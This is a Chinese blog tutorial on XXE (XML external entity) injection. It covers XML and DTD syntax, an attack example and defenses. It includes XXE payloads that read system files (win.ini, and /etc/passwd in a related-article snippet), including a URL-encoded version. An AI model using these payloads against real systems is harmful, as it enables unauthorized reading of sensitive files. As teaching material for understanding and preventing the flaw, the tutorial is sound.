XXE外部实体引入漏洞原理及复现

最新推荐文章于 2024-07-25 19:15:41 发布
最新推荐文章于 2024-07-25 19:15:41 发布
阅读量787 收藏
点赞数
文章标签: javascript 开发语言 ecmascript
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wangdongchengya/article/details/129225914
版权

文章目录

1.简介

XXE (XML 外部实体) 是一种安全漏洞,影响解析 XML 输入的应用程序。该漏洞允许攻击者在 XML 文档中注入外部实体, DTD 可以在 XML 文档中引用外部实体。如果 XML 解析器未正确验证外部实体的内容,攻击者可以利用 XXE 漏洞读取系统的机密数据,或者在恶意 DTD 文件中执行任意代码。

当应用程序未能正确处理传入的 XML 数据或未限制可以处理的实体类型时,XXE 可能发生。因此,攻击者可以构造一个包含外部实体的恶意 XML 文档,该外部实体由脆弱的应用程序处理。

2.XML基本语法

2.1.文档声明

XML 文档必须以一个特殊的声明开头,用于指示 XML 文件的版本和编码。格式如下:

<?xml version="1.0" encoding="UTF-8"?>

2.2.根元素

XML 文档必须有一个根元素,它是整个文档的容器。根元素包含其他元素,并以标签的形式定义。例如:

<root>
...
</root>

2.3.元素

XML 文档中的所有数据都存储在元素中。元素用标签定义,并以开始标签和结束标签的形式表示。例如:

<element>This is a sample element</element>

2.4.属性

元素可以有属性,用于提供有关元素的其他信息。属性以名称/值对的形式出现在元素的开始标签中。例如:

<element attribute="value">This is a sample element</element>

2.5.注释

XML 文档可以包含注释,用于提供有关代码的信息。注释以特殊的标记开头,并以特殊的标记结尾。例如:

<!-- This is a sample comment -->

2.6.CDATA

XML 文档可以包含 CDATA(不被解析的数据)。CDATA 用于包含不需要解析的数据,例如 HTML 或 JavaScript 代码。CDATA 以特殊的标记开头和结尾。例如:

<![CDATA[This is a sample CDATA]]>

2.7.空元素

XML 中的空元素是没有内容的元素。它以特殊的标记表示,例如:

<empty_element />

3.DTD基本语法

3.1.要点

DTD 文档以 <!DOCTYPE 开头,后跟元素的类型和 DTD 文件的位置。

元素定义以 <!ELEMENT 开头,后跟元素的名称和其子元素的描述。

属性定义以 <!ATTLIST 开头,后跟元素的名称和其属性的描述。

元素类型可以是元素的名称、#PCDATA(表示元素中的文本)或其他元素类型的序列。

可以使用通配符(例如 * 和 +)来描述元素出现的次数。

可以使用括号(例如 (A|B))来描述多个元素的选择。

可以使用引用(例如 %name;)来重复使用元素定义。

所有定义必须以分号结尾。

3.2.DTD 示例

<!DOCTYPE book [
<!ELEMENT book (title, author, pages)>
<!ELEMENT title (#PCDATA)>
<!ELEMENT author (#PCDATA)>
<!ELEMENT pages (#PCDATA)>
<!ATTLIST book ISBN CDATA #REQUIRED>
]>

4.攻击

<?xml version="1.0"?> 
<!DOCTYPE foo [    
<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini" > ]> 
<foo>&xxe;</foo>

在可能存在漏洞的点,尝试利用XXE读取win.ini,这里对其做了一个简单的URL编码

%3C%3Fxml+version%3D%221.0%22%3F%3E++%3C%21DOCTYPE+foo+%5B+++++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E+%5D%3E++%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E&submit=%E6%8F%90%E4%BA%A4

请添加图片描述

5.防范

  • 禁用 XML 解析器中的外部实体处理
  • 验证传入的 XML 数据,以确保其仅包含允许的实体
  • 使用安全的库和 API 处理 XML 数据
  • 实施适当的输入验证,防止恶意的 XML 输入
G3et
关注
[网络安全自学篇] 四十八.Cracer第八期——(1)安全术语、Web渗透流程、Windows基础、注册表及黑客常用DOS命令
杨秀璋的专栏
02-21 2万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了微软证书漏洞(CVE-2020-0601),并详细讲解了Windows验证机制、可执行文件签名复现及HTTPS劫持。本文将分享另一个主题——Cracer教程,第一篇文章将详细讲解安全术语、Web渗透流程和Windows基础、注册表及黑客常用DOS命令。基础性文章,希望对您有所帮助。
XXE漏洞复现步骤
zxcvbnmasdflzl的博客
06-24 1020
另外,一般来说,服务器解析XML有两种方式,一种是一次性将整个XML加载进内存中,进行解析;如果我们递归地调用XML定义,一次性调用巨量的定义,那么服务器的内存就会被消耗完,造成了拒绝服务攻击。既然XML可以从外部读取DTD文件,那我们就自然地想到了如果将路径换成另一个文件的路径,那么服务器在解析这个XML的时候就会把那个文件的内容赋值给SYSTEM前面的根元素中,只要我们在XML中让前面的根元素的内容显示出来,不就可以读取那个文件的内容了。3.检查所使用的底层xml解析库,默认禁止外部实体的解析。
XXE漏洞复现
春日野穹
10-23 3053
引言~ XXE就是XML外部实体注入,当允许引用外部实体时, XML数据在传输中有可能会被不法分子被修改,如果服务器执行被恶意插入的代码,就可以实现攻击的目的攻击者可以通过构造恶意内容,就可能导致任意文件读取,系统命令执行,内网端口探测,攻击内网网站等危害。 实验环境~ PHP版本:5.4.45 中间件:apache 复现平台:皮卡丘漏洞练习平台 libXML编译版本:2.7.8 libxm...
xxe简单漏洞复现
西部壮仔的博客
05-25 899
xml初识 XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素 漏洞复现 php代码: <?php $xml = file_get_contents("php://input"); $data = simplexml_load_string($xml); echo "<pre>"; print_r($data); //注释掉该语句即为无回显的情
【网络安全】JAVA代码审计—— XXE外部实体注入
HBohan的博客
01-14 1170
想要了解XXE,在那之前需要了解XML的相关基础
浅浅浅浅谈XXE漏洞(附XXE攻击实例CVE-2017-12629)
SoulCat
03-06 3829
- `山有木兮木有枝,心悦君兮君不知`
网络攻防实践报告1
08-03
7. XXE:此漏洞发生在解析XML文档时,允许攻击者通过外部实体注入获取敏感信息。分析包括了如何触发攻击以及如何避免在处理XML引入此类风险。 8. 弱口令:简单的密码策略容易导致账户被破解。通过漏洞复现,学生...
xxe漏洞之——漏洞复现
wsnbbz的博客
03-04 1471
漏洞介绍 XXE全称XML External Entity Injection,也就是XML外部实体注入攻击,漏洞是对非安全的外部实体数据进行处理时引发的安全问题。要了解XXE,就必须懂得XML的一些规则。 XML是用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言XML文档结构包括XML声明、DTD文档类型定义(可选)、文档...
XXE漏洞复现
weixin_45643931的博客
08-20 814
XXE漏洞 全称XML External Entity Injection即XML外部实体注入漏洞 由名字可以知道 这是关于XML漏洞 SQL注入是在注入点处输入SQL恶意语法执行达到自己的目的 那么XXE应该也是类似的 在可以解析XML的地方(比如一个输入框等处)提交XML的恶意代码来执行 ⅩXE漏洞发生在应用序解析ⅩML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害 ...
XXE漏洞复现实操
wutiangui的博客
10-13 932
(1)XXE漏洞全称XML External Entity Injection,即xmI外部实体注入漏洞XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害,XML(也是一种语言)被设计用来传输和存储数据。(2)也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致漏洞。如果能够建立连接,那么服务器端的ncat会收到相应的请求信息。
Apache solr xxe漏洞复现(CVE-2017-12629)
whojoe的博客
07-06 2065
Apache solr xxe漏洞复现(CVE-2017-12629)前言环境搭建漏洞复现参考文章 前言 影响版本 Apache Solr < 7.1 Apache Lucene < 7.1 环境搭建 启动docker systemctl start docker 获取vulhub git clone --depth=1 https://github.com.cnpmjs.org/vulhub/vulhub.git 进入对应目录 cd vulhub/solr/CVE-2017-12629-X
Vulnhub--XXE漏洞复现
qq_62169455的博客
08-23 422
下载完后,选择OVF文件,打开方式选择VMware,存储位置看你自己,然后打开靶机需要我们去登录,这里是没有现成的信息可以让我们登录(Vulnhub的靶场就是比较贴近于实战的环境,这里登录进去就可以直接看到flag,所以它不会直接给我们登录信息),于是就需要通过其他一些渗透手段来获取登录信息。
漏洞复现xxe漏洞
千寻的博客
07-30 707
文章目录XXE-基础实验实验目的实验环境实验工具实验内容实验步骤1.访问目标进行注入攻击2.尝试进行登录,并进行抓包3.根据xxe注入漏洞,构造payloa免责声明 XXE-基础实验 实验目的 练习XXE(XML注入) 实验环境 目标机: windows2008 172.16.12.2 目标地址:http://172.16.12.2 实验工具 火狐浏览器:是一款非常稳定,非常流行的Internet浏览器 Burp Suite 实验内容 XXE(XML注入) 实验步骤 1.访问目标进行
XXE漏洞靶场复现
weixin_63124284的博客
10-19 924
XXE也叫XML(可扩展标记语言外部实体注入,然后我们这里拆开来解释!!! 外部实体:通过调用外部实体声明部分对XML数据进行修改、插入恶意代码。 注入:在XML数据传输过程中,数据被恶意修改,导致服务器最终执行了修改后的恶意代码。 因此XXE指的是XML数据在传输过程中,利用外部实体声明部分的“SYSTEM”关键字导致XML解析器可以从本地文件或者远程的URL中读取受保护的数据。
XXE漏洞靶机复现
最新发布
C233333235的博客
07-25 468
然后再次回去登录进行抓包(因为管理员登陆页面没有xxe,所以回到第一个登陆页面),然后用如下代码替换xml语句(后来发现不用重新抓包,一直用重放器里的请求包就行)他说flag在这个里面,所以据推测这也是一段编码文字,我们再次拿去解码,试了base64后发现解码失败,我们再试试base32,发现解码成功了.像之前一样再次拿去登陆抓包中,用xml语句进行查询,语句如下(后来发现不用重新抓包,一直用重放器里的请求包就行)但是这仍然不是我们要的路径,再次拿去解码,这次又变成了base64,解码成功。
XXE漏洞复现(有无回显)
cainiao17441898的博客
07-01 1813
环境:这里可以在metasploitable中进行试验,不可以在centos中进行试验,因为默认情况下centos中已经修复相关漏洞。libxml2.9.0之后默认不执行外部实体。用命令:rpm -qa | grep libxml可以去查看libxml的版本。 复现: 先去生成一个解析xml数据并打印传入的数据的一个php文件。 <?php $xml=file_get_contents("php://input"); $data = simplexml_load_string($xml) ; e
XML外部实体注入漏洞原理
05-24
XML外部实体注入漏洞XML External Entity Injection, 简称XXE)是一种常见的安全漏洞,攻击者可以利用这种漏洞来读取任意文件、执行系统命令等操作。 在XML文档中,可以通过定义实体来引用外部资源,例如文件、URL等。当XML解析器解析XML文档时,如果不对外部实体进行限制,攻击者可以通过构造恶意的XML文档,将外部实体指向敏感文件或者恶意URL,从而导致漏洞。 具体来说,攻击者可以在XML文档中定义一个实体,使用DTD(Document Type Definition)语法将该实体指向一个外部文件,然后在XML文档中使用该实体。当XML解析器解析该实体时,就会将指定的外部文件读取进来,从而导致漏洞。 例如,下面的XML文档定义了一个名为“file”的实体,指向了一个敏感文件“/etc/passwd”: ``` <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE message [ <!ELEMENT message (#PCDATA)> <!ENTITY file SYSTEM "file:///etc/passwd"> ]> <message>&file;</message> ``` 如果XML解析器不对外部实体进行限制,那么解析该文档时就会读取“/etc/passwd”文件的内容,并将其包含在<message>元素中返回给应用程序,从而导致敏感信息泄漏。 为了防止XXE漏洞,可以采取以下措施: 1. 禁止使用外部实体,或者限制外部实体的使用范围。可以在XML解析器中设置相关参数,例如禁止加载外部实体、禁止解析DTD等。 2. 对外部实体进行白名单过滤,只允许加载特定的URL或文件。 3. 检查输入数据,避免恶意输入注入XML文档中。 4. 对于持久化的XML数据,应该使用安全的XML库来处理,例如使用DOM4J或JAXB等库,这些库会自动过滤掉外部实体
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值